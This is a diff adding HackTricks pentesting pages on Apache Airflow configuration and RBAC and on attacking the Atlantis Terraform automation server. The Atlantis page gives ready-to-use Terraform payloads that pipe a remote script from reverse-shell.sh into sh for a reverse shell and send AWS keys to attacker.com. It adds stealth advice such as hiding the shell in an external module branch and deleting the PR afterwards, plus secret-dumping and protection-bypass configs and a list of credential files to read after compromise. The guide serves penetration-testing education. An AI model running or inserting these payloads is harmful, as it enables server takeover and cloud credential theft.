+Moreover, the same vulnerability might occur with **variables** (note that with enough privileges you could **control the value of the variables** in the GUI). Variables are **accessed with**:
+
+```python
+from airflow.models import Variable
+[...]
+foo = Variable.get("foo")
+```
+
+If they are used for example inside a a bash command, you could perform a command injection.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md b/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md
new file mode 100644
index 0000000000..2508f970fc
--- /dev/null
+++ b/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md
@@ -0,0 +1,137 @@
+# Airflow Configuration
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Configuration File
+
+**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.**
+
+**There are two ways to access this file: By compromising some airflow machine, or accessing the web console.**
+
+Note that the **values inside the config file** **might not be the ones used**, as you can overwrite them setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`.
+
+If you have access to the **config file in the web server**, you can check the **real running configuration** in the same page the config is displayed.\
+If you have **access to some machine inside the airflow env**, check the **environment**.
+
+Some interesting values to check when reading the config file:
+
+### \[api]
+
+* **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS**
+* **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS**
+* **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS**
+* **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access to the API:
+  * `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API
+  * `airflow.api.auth.backend.default`: **Everyone can** access it without authentication
+  * `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication**
+  * `airflow.api.auth.backend.basic_auth`: For **basic authentication**
+  * `airflow.composer.api.backend.composer_auth`: Uses composers authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)).
+    * `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default).
+  * You can also **create you own authentication** method with python.
+* **`google_key_path`:** Path to the **GCP service account key**
+
+### **\[atlas]**
+
+* **`password`**: Atlas password
+* **`username`**: Atlas username
+
+### \[celery]
+
+* **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_)
+* **`result_backend`**: Postgres url which may contain **credentials**.
+* **`ssl_cacert`**: Path to the cacert
+* **`ssl_cert`**: Path to the cert
+* **`ssl_key`**: Path to the key
+
+### \[core]
+
+* **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that don’t contain the strings `DAG` and `airflow`.
+* **`fernet_key`**: Key to store encrypted variables (symmetric)
+* **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections.
+* **`security`**: What security module to use (for example kerberos)
+
+### \[dask]
+
+* **`tls_ca`**: Path to ca
+* **`tls_cert`**: Part to the cert
+* **`tls_key`**: Part to the tls key
+
+### \[kerberos]
+
+* **`ccache`**: Path to ccache file
+* **`forwardable`**: Enabled by default
+
+### \[logging]
+
+* **`google_key_path`**: Path to GCP JSON creds.
+
+### \[secrets]
+
+* **`backend`**: Full class name of secrets backend to enable
+* **`backend_kwargs`**: The backend\_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class.
+
+### \[smtp]
+
+* **`smtp_password`**: SMTP password
+* **`smtp_user`**: SMTP user
+
+### \[webserver]
+
+* **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value
+* **`cookie_secure`**: Set **secure flag** on the the session cookie
+* **`expose_config`**: By default is False, if true, the **config** can be **read** from the web **console**
+* **`expose_stacktrace`**: By default it's True, it will show **python tracebacks** (potentially useful for an attacker)
+* **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**)
+* **`web_server_ssl_cert`**: **Path** to the **SSL** **cert**
+* **`web_server_ssl_key`**: **Path** to the **SSL** **Key**
+* **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible
+
+### Web Authentication
+
+By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as
+
+```bash
+AUTH_TYPE = AUTH_DB
+```
+
+Which means that the **authentication is checked against the database**. However, other configurations are possible like
+
+```bash
+AUTH_TYPE = AUTH_OAUTH
+```
+
+To leave the **authentication to third party services**.
+
+However, there is also an option to a**llow anonymous users access**, setting the following parameter to the **desired role**:
+
+```bash
+AUTH_ROLE_PUBLIC = 'Admin'
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md b/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md
new file mode 100644
index 0000000000..94580b7b0d
--- /dev/null
+++ b/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md
@@ -0,0 +1,69 @@
+# Airflow RBAC
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## RBAC
+
+(From the docs)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles.
+
+* **`Admin`** users have all possible permissions.
+* **`Public`** users (anonymous) don’t have any permissions.
+* **`Viewer`** users have limited viewer permissions (only read). It **cannot see the config.**
+* **`User`** users have `Viewer` permissions plus additional user permissions that allows him to manage DAGs a bit. He **can see the config file**
+* **`Op`** users have `User` permissions plus additional op permissions.
+
+Note that **admin** users can **create more roles** with more **granular permissions**.
+
+Also note that the only default role with **permission to list users and roles is Admin, not even Op** is going to be able to do that.
+
+### Default Permissions
+
+These are the default permissions per default role:
+
+* **Admin**
+
+\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on Roles, can read on Permissions, can delete on Roles, can edit on Roles, can create on Roles, can read on Users, can create on Users, can edit on Users, can delete on Users, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs, can read on Task Reschedules, menu access on Task Reschedules, can read on Triggers, menu access on Triggers, can read on Passwords, can edit on Passwords, menu access on List Users, menu access on Security, menu access on List Roles, can read on User Stats Chart, menu access on User's Statistics, menu access on Base Permissions, can read on View Menus, menu access on Views/Menus, can read on Permission Views, menu access on Permission on Views/Menus, can get on MenuApi, menu access on Providers, can create on XComs]
+
+* **Op**
+
+\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs]
+
+* **User**
+
+\[can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances]
+
+* **Viewer**
+
+\[can read on DAGs, can read on DAG Runs, can read on Task Instances, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances]
+
+* **Public**
+
+\[]
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/atlantis-security.md b/pentesting-ci-cd/atlantis-security.md
new file mode 100644
index 0000000000..a82b0d255e
--- /dev/null
+++ b/pentesting-ci-cd/atlantis-security.md
@@ -0,0 +1,422 @@
+# Atlantis Security
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### Basic Information
+
+Atlantis basically helps you to to run terraform from Pull Requests from your git server.
+
+![](<../.gitbook/assets/image (161).png>)
+
+### Local Lab
+
+1. Go to the **atlantis releases page** in [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) and **download** the one that suits you.
+2. Create a **personal token** (with repo access) of your **github** user
+3. Execute `./atlantis testdrive` and it will create a **demo repo** you can use to **talk to atlantis**
+   1. You can access the web page in 127.0.0.1:4141
+
+### Atlantis Access
+
+#### Git Server Credentials
+
+**Atlantis** support several git hosts such as **Github**, **Gitlab**, **Bitbucket** and **Azure DevOps**.\
+However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).\
+[**The docs**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) encourage to create a user in these platform specifically for Atlantis, but some people might use personal accounts.
+
+{% hint style="warning" %}
+In any case, from an attackers perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**.
+{% endhint %}
+
+#### Webhooks
+
+Atlantis uses optionally [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) to validate that the **webhooks** it receives from your Git host are **legitimate**.
+
+One way to confirm this would be to **allowlist requests to only come from the IPs** of your Git host but an easier way is to use a Webhook Secret.
+
+Note that unless you use a private github or bitbucket server, you will need to expose webhook endpoints to the Internet.
+
+{% hint style="warning" %}
+Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attackers perspective it would be interesting to know **if you can send it messages**.
+{% endhint %}
+
+#### Provider Credentials <a href="#provider-credentials" id="provider-credentials"></a>
+
+[From the docs:](https://www.runatlantis.io/docs/provider-credentials.html)
+
+Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider.
+
+It's up to you how you [provide credentials](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) for your specific provider to Atlantis:
+
+* The Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) and [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) have their own mechanisms for provider credentials. Read their docs.
+* If you're running Atlantis in a cloud then many clouds have ways to give cloud API access to applications running on them, ex:
+  * [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Search for "EC2 Role")
+  * [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference)
+* Many users set environment variables, ex. `AWS_ACCESS_KEY`, where Atlantis is running.
+* Others create the necessary config files, ex. `~/.aws/credentials`, where Atlantis is running.
+* Use the [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) to obtain provider credentials.
+
+{% hint style="warning" %}
+The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform.
+{% endhint %}
+
+#### Web Page
+
+By default Atlantis will run a **web page in the port 4141 in localhost**. This page just allows you to enable/disable atlantis apply and check the plan status of the repos and unlock them (it doesn't allow to modify things, so it isn't that useful).
+
+You probably won't find it exposed to the internet, but it looks like by default **no credentials are needed** to access it (and if they are `atlantis`:`atlantis` are the **default** ones).
+
+### Server Configuration
+
+Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three.
+
+* You can find [**here the list of flags**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) supported by Atlantis server
+* You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables)
+
+Values are **chosen in this order**:
+
+1. Flags
+2. Environment Variables
+3. Config File
+
+{% hint style="warning" %}
+Note that in the configuration you might find interesting values such as **tokens and passwords**.
+{% endhint %}
+
+#### Repos Configuration
+
+Some configurations affects **how the repos are managed**. However, it's possible that **each repo require different settings**, so there are ways to specify each repo. This is the priority order:
+
+1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) file. This file can be used to specify how atlantis should treat the repo. However, by default some keys cannot be specified here without some flags allowing it.
+   1. Probably required to be allowed by flags like `allowed_overrides` or `allow_custom_workflows`
+2. [**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): You can pass it with the flag `--repo-config` and it's a yaml configuring new settings for each repo (regexes supported)
+3. **Default** values
+
+**PR Protections**
+
+Atlantis allows to indicate if you want the **PR** to be **`approved`** by somebody else (even if that isn't set in the branch protection) and/or be **`mergeable`** (branch protections passed) **before running apply**. From a security point of view, to set both options a recommended.
+
+In case `allowed_overrides` is True, these setting can be **overwritten on each project by the `/atlantis.yml` file**.
+
+**Scripts**
+
+The repo config can **specify scripts** to run [**before**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) (_pre workflow hooks_) and [**after**](https://www.runatlantis.io/docs/post-workflow-hooks.html) (_post workflow hooks_) a **workflow is executed.**
+
+There isn't any option to allow **specifying** these scripts in the **repo `/atlantis.yml`** file.
+
+**Workflow**
+
+In the repo config (server side config) you can [**specify a new default workflow**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), or [**create new custom workflows**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** You can also **specify** which **repos** can **access** the **new** ones generated.\
+Then, you can allow the **atlantis.yaml** file of each repo to **specify the workflow to use.**
+
+{% hint style="danger" %}
+If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used.\
+This will basically give **RCE in the Atlantis server to any user that can access that repo**.
+
+```yaml
+# atlantis.yaml
+version: 3
+projects:
+- dir: .
+  workflow: custom1
+workflows:
+  custom1:
+    plan:
+      steps:
+      - init
+      - run: my custom plan command
+    apply:
+      steps:
+      - run: my custom apply command
+```
+{% endhint %}
+
+**Conftest Policy Checking**
+
+Atlantis supports running **server-side** [**conftest**](https://www.conftest.dev/) **policies** against the plan output. Common usecases for using this step include:
+
+* Denying usage of a list of modules
+* Asserting attributes of a resource at creation time
+* Catching unintentional resource deletions
+* Preventing security risks (ie. exposing secure ports to the public)
+
+You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works).
+
+### Atlantis Commands
+
+[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis:
+
+```bash
+# Get help
+atlantis help
+
+# Run terraform plan
+atlantis plan [options] -- [terraform plan flags]
+##Options:
+## -d directory
+## -p project
+## --verbose
+## You can also add extra terraform options
+
+# Run terraform apply
+atlantis apply [options] -- [terraform apply flags]
+##Options:
+## -d directory
+## -p project
+## -w workspace
+## --auto-merge-disabled
+## --verbose
+## You can also add extra terraform options 
+```
+
+### Attacks
+
+{% hint style="warning" %}
+If during the exploitation you find this **error**: `Error: Error acquiring the state lock`
+
+You can fix it by running:
+
+```
+atlantis unlock #You might need to run this in a different PR
+atlantis plan -- -lock=false
+```
+{% endhint %}
+
+#### Atlantis plan RCE - Config modification in new PR
+
+If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis plan`** (or maybe it's automatically executed) **you will be able to RCE inside the Atlantis server**.
+
+You can do this by making [**Atlantis load an external data source**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source). Just put a payload like the following in the `main.tf` file:
+
+```json
+data "external" "example" {
+  program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
+}
+```
+
+**Stealthier Attack**
+
+You can perform this attack even in a **stealthier way**, by following this suggestions:
+
+* Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell:
+
+```javascript
+module "not_rev_shell" {
+  source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
+}
+```
+
+You can find the rev shell code in [https://github.com/carlospolop/terraform\_external\_module\_rev\_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules)
+
+* In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
+* **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**.
+
+#### Atlantis plan Secrets Dump
+
+You can **dump secrets used by terraform** running `atlantis plan` (`terraform plan`) by putting something like this in the terraform file:
+
+```json
+output "dotoken" {
+  value = nonsensitive(var.do_token)
+}
+```
+
+#### Atlantis apply RCE - Config modification in new PR
+
+If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis apply` you will be able to RCE inside the Atlantis server**.
+
+However, you will usually need to bypass some protections:
+
+* **Mergeable**: If this protection is set in Atlantis, you can only run **`atlantis apply` if the PR is mergeable** (which means that the branch protection need to be bypassed).
+  * Check potential [**branch protections bypasses**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
+* **Approved**: If this protection is set in Atlantis, some **other user must approve the PR** before you can run `atlantis apply`
+  * By default you can abuse the [**Gitbot token to bypass this protection**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
+
+Running **`terraform apply` on a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
+You just need to make sure some payload like the following ones ends in the `main.tf` file:
+
+```json
+// Payload 1 to just steal a secret
+resource "null_resource" "secret_stealer" {
+  provisioner "local-exec" {
+    command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
+  }
+}
+
+// Payload 2 to get a rev shell
+resource "null_resource" "rev_shell" {
+  provisioner "local-exec" {
+    command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
+  }
+}
+```
+
+Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way**.
+
+#### Terraform Param Injection
+
+When running `atlantis plan` or `atlantis apply` terraform is being run under-needs, you can pass commands to terraform from atlantis commenting something like:
+
+```bash
+atlantis plan -- <terraform commands>
+atlantis plan -- -h #Get terraform plan help
+
+atlantis apply -- <terraform commands>
+atlantis apply -- -h #Get terraform apply help
+```
+
+Something you can pass are env variables which might be helpful to bypass some protections. Check terraform env vars in [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables)
+
+#### Custom Workflow
+
+Running **malicious custom build commands** specified in an `atlantis.yaml` file. Atlantis uses the `atlantis.yaml` file from the pull request branch, **not** of `master`.\
+This possibility was mentioned in a previous section:
+
+{% hint style="danger" %}
+If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used.
+
+This will basically give **RCE in the Atlantis server to any user that can access that repo**.
+
+```yaml
+# atlantis.yaml
+version: 3
+projects:
+- dir: .
+  workflow: custom1
+workflows:
+  custom1:
+    plan:
+      steps:
+      - init
+      - run: my custom plan command
+    apply:
+      steps:
+      - run: my custom apply command
+```
+{% endhint %}
+
+#### Bypass plan/apply protections
+
+If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allowed_overrides` _has_ `apply_requirements` configured, it's possible for a repo to **modify the plan/apply protections to bypass them**.
+
+```yaml
+repos:
+- id: /.*/
+  apply_requirements: []
+```
+
+#### PR Hijacking
+
+If someone sends **`atlantis plan/apply` comments on your valid pull requests,** it will cause terraform to run when you don't want it to.
+
+Moreover, if you don't have configured in the **branch protection** to ask to **reevaluate** every PR when a **new commit is pushed** to it, someone could **write malicious configs** (check previous scenarios) in the terraform config, run `atlantis plan/apply` and gain RCE.
+
+This is the **setting** in Github branch protections:
+
+![](<../.gitbook/assets/image (216).png>)
+
+#### Webhook Secret
+
+If you manage to **steal the webhook secret** used or if there **isn't any webhook secret** being used, you could **call the Atlantis webhook** and **invoke atlatis commands** directly.
+
+#### Bitbucket
+
+Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs.
+
+* This means that an **attacker** could make **fake requests to Atlantis** that look like they're coming from Bitbucket.
+* If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos.
+* To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses).
+
+### Post-Exploitation
+
+If you managed to get access to the server or at least you got a LFI there are some interesting things you should try to read:
+
+* `/home/atlantis/.git-credentials` Contains vcs access credentials
+* `/atlantis-data/atlantis.db` Contains vcs access credentials with more info
+* `/atlantis-data/repos/<org_name>`_`/`_`<repo_name>/<pr_num>/<workspace>/<path_to_dir>/.terraform/terraform.tfstate` Terraform stated file
+  * Example: /atlantis-data/repos/ghOrg\_/\_myRepo/20/default/env/prod/.terraform/terraform.tfstate
+* `/proc/1/environ` Env variables
+* `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data)
+
+### Mitigations
+
+#### Don't Use On Public Repos <a href="#don-t-use-on-public-repos" id="don-t-use-on-public-repos"></a>
